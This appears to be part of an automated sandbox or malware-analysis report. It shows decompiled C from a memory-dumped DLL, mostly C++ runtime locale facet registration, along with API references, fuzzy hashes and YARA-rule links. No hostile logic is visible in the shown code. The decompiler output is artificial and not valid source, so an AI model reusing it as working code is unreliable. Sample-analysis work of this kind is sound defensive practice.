																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6DDD66BA(_t462 - 0x14);
																							return E6DDF0075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6DDE14EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t462 - 0x20);
																									E6DDF3D74(_t462 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t327, _t436, _t447, 0x14);
																									E6DDD6653(_t462 - 0x14, 0);
																									_t448 =  *0x6de96dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6DDB161C(0x6de96d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6DDD66BA(_t462 - 0x14);
																										return E6DDF0075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6DDE1558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t462 - 0x20);
																												E6DDF3D74(_t462 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t327, _t437, _t448, 0x14);
																												E6DDD6653(_t462 - 0x14, 0);
																												_t449 =  *0x6de96e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6DDB161C(0x6de96dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6DDD66BA(_t462 - 0x14);
																													return E6DDF0075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6DDE15C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t462 - 0x20);
																															E6DDF3D74(_t462 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t327, _t438, _t449, 0x14);
																															E6DDD6653(_t462 - 0x14, 0);
																															_t450 =  *0x6de96dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6DDB161C(0x6de96d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6DDD66BA(_t462 - 0x14);
																																return E6DDF0075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6DDE162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6DDB1438(_t397);
																																		E6DDF3D74(_t462 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de3851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6de3c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6DDE542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6DDF0075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t439);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6de96dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6DDD6FD3(__eflags, _t438);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6de96e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6DDD6FD3(__eflags, _t437);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6de96dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6DDD6FD3(__eflags, _t436);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6de96dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6DDD6FD3(__eflags, _t435);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6de96de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6DDD6FD3(__eflags, _t434);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6de96ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6DDD6FD3(__eflags, _t433);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6de96db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6DDD6FD3(__eflags, _t432);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6de96dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6DDD6FD3(__eflags, _t431);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6de96dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6DDD6FD3(__eflags, _t430);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6de96dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF6C4
int.LIBCPMT ref: 6DDDF6DB

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF6FE
std::_Facet_Register.LIBCPMT ref: 6DDDF715
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF735
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF753

Strings

|mm, xrefs: 6DDDF6CF

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |mm
API String ID: 113178234-2398550710
Opcode ID: bb708b6b9c8e345f07566700cfad0a10f242dd75648aa936152559e02cdf4f90
Instruction ID: cee5503f70c73b35fcba8a2d9db0ea0da376db1286e34c82d85a95dcc00c96cd
Opcode Fuzzy Hash: bb708b6b9c8e345f07566700cfad0a10f242dd75648aa936152559e02cdf4f90
Instruction Fuzzy Hash: B911C275908559EBCF01FBA4C840AFDB7B4AF84318F260009F521AB290DF74DA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t858 - 0x14, 0);
				_t819 =  *0x6de96dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6DDB161C(0x6de96b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6DDD66BA(_t858 - 0x14);
					return E6DDF0075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6DDE0E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t858 - 0x20);
							E6DDF3D74(_t858 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t799, _t819, 0x14);
							E6DDD6653(_t858 - 0x14, 0);
							_t820 =  *0x6de96de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6DDB161C(0x6de96d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6DDD66BA(_t858 - 0x14);
								return E6DDF0075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6DDE0EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t858 - 0x20);
										E6DDF3D74(_t858 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t606, _t800, _t820, 0x14);
										E6DDD6653(_t858 - 0x14, 0);
										_t821 =  *0x6de96db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6DDB161C(0x6de96d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6DDD66BA(_t858 - 0x14);
											return E6DDF0075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6DDE0F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t858 - 0x20);
													E6DDF3D74(_t858 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t606, _t801, _t821, 0x14);
													E6DDD6653(_t858 - 0x14, 0);
													_t822 =  *0x6de96dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6DDB161C(0x6de96d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6DDD66BA(_t858 - 0x14);
														return E6DDF0075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6DDE0F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t858 - 0x20);
																E6DDF3D74(_t858 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t606, _t802, _t822, 0x14);
																E6DDD6653(_t858 - 0x14, 0);
																_t823 =  *0x6de96dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6DDB161C(0x6de96d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6DDD66BA(_t858 - 0x14);
																	return E6DDF0075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6DDE0FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t858 - 0x20);
																			E6DDF3D74(_t858 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t606, _t803, _t823, 0x14);
																			E6DDD6653(_t858 - 0x14, 0);
																			_t824 =  *0x6de96df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6DDB161C(0x6de96d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6DDD66BA(_t858 - 0x14);
																				return E6DDF0075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6DDE1057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t858 - 0x20);
																						E6DDF3D74(_t858 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t606, _t804, _t824, 0x14);
																						E6DDD6653(_t858 - 0x14, 0);
																						_t825 =  *0x6de96dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6DDB161C(0x6de96d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6DDD66BA(_t858 - 0x14);
																							return E6DDF0075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6DDE10BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t858 - 0x20);
																									E6DDF3D74(_t858 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t606, _t805, _t825, 0x14);
																									E6DDD6653(_t858 - 0x14, 0);
																									_t826 =  *0x6de96df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6DDB161C(0x6de96da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6DDD66BA(_t858 - 0x14);
																										return E6DDF0075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6DDE1127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t858 - 0x20);
																												E6DDF3D74(_t858 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t606, _t806, _t826, 0x14);
																												E6DDD6653(_t858 - 0x14, 0);
																												_t827 =  *0x6de96df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6DDB161C(0x6de96da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6DDD66BA(_t858 - 0x14);
																													return E6DDF0075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6DDE11AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t858 - 0x20);
																															E6DDF3D74(_t858 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t606, _t807, _t827, 0x14);
																															E6DDD6653(_t858 - 0x14, 0);
																															_t828 =  *0x6de96dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6DDB161C(0x6de96d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6DDD66BA(_t858 - 0x14);
																																return E6DDF0075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6DDE1230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t858 - 0x20);
																																		E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t606, _t808, _t828, 0x14);
																																		E6DDD6653(_t858 - 0x14, 0);
																																		_t829 =  *0x6de96dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6DDB161C(0x6de96d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6DDD66BA(_t858 - 0x14);
																																			return E6DDF0075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6DDE12B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t858 - 0x20);
																																					E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t606, _t809, _t829, 0x14);
																																					E6DDD6653(_t858 - 0x14, 0);
																																					_t830 =  *0x6de96dd8; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6DDB161C(0x6de96d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6DDD66BA(_t858 - 0x14);
																																						return E6DDF0075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6DDE1339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t858 - 0x20);
																																								E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t606, _t810, _t830, 0x14);
																																								E6DDD6653(_t858 - 0x14, 0);
																																								_t831 =  *0x6de96db0; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6DDB161C(0x6de96d64);
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6DDD66BA(_t858 - 0x14);
																																									return E6DDF0075(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(_t831 == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6DDE13A1(_t606, _t693, _t797, _t811, _t831) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t858 - 0x20);
																																											E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t606, _t811, _t831, 0x14);
																																											E6DDD6653(_t858 - 0x14, 0);
																																											_t832 =  *0x6de96ddc; // 0x0
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6DDB161C(0x6de96d88);
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t448);
																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6DDD66BA(_t858 - 0x14);
																																												return E6DDF0075(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(_t832 == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6DDE1409(_t606, _t700, _t797, _t812, _t832) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t858 - 0x20);
																																														E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t606, _t812, _t832, 0x14);
																																														E6DDD6653(_t858 - 0x14, 0);
																																														_t833 =  *0x6de96de0; // 0x0
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6DDB161C(0x6de96d8c);
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6DDD66BA(_t858 - 0x14);
																																															return E6DDF0075(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(_t833 == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6DDE1471(_t606, _t707, _t797, _t813, _t833) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t858 - 0x20);
																																																	E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t606, _t813, _t833, 0x14);
																																																	E6DDD6653(_t858 - 0x14, 0);
																																																	_t834 =  *0x6de96dfc; // 0x0
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6DDB161C(0x6de96da8);
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t858 - 0x14);
																																																		return E6DDF0075(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(_t834 == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6DDE14EC(_t606, _t714, _t797, _t814, _t834) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t858 - 0x20);
																																																				E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t606, _t814, _t834, 0x14);
																																																				E6DDD6653(_t858 - 0x14, 0);
																																																				_t835 =  *0x6de96dcc; // 0x0
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6DDB161C(0x6de96d80);
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t858 - 0x14);
																																																					return E6DDF0075(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(_t835 == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6DDE1558(_t606, _t721, _t797, _t815, _t835) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t858 - 0x20);
																																																							E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t606, _t815, _t835, 0x14);
																																																							E6DDD6653(_t858 - 0x14, 0);
																																																							_t836 =  *0x6de96e00; // 0x0
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6DDB161C(0x6de96dac);
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t858 - 0x14);
																																																								return E6DDF0075(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(_t836 == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6DDE15C4(_t606, _t728, _t797, _t816, _t836) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6DDB1438(_t858 - 0x20);
																																																										E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de383cf, _t606, _t816, _t836, 0x14);
																																																										E6DDD6653(_t858 - 0x14, 0);
																																																										_t837 =  *0x6de96dd0; // 0x0
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6DDB161C(0x6de96d60);
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t513);
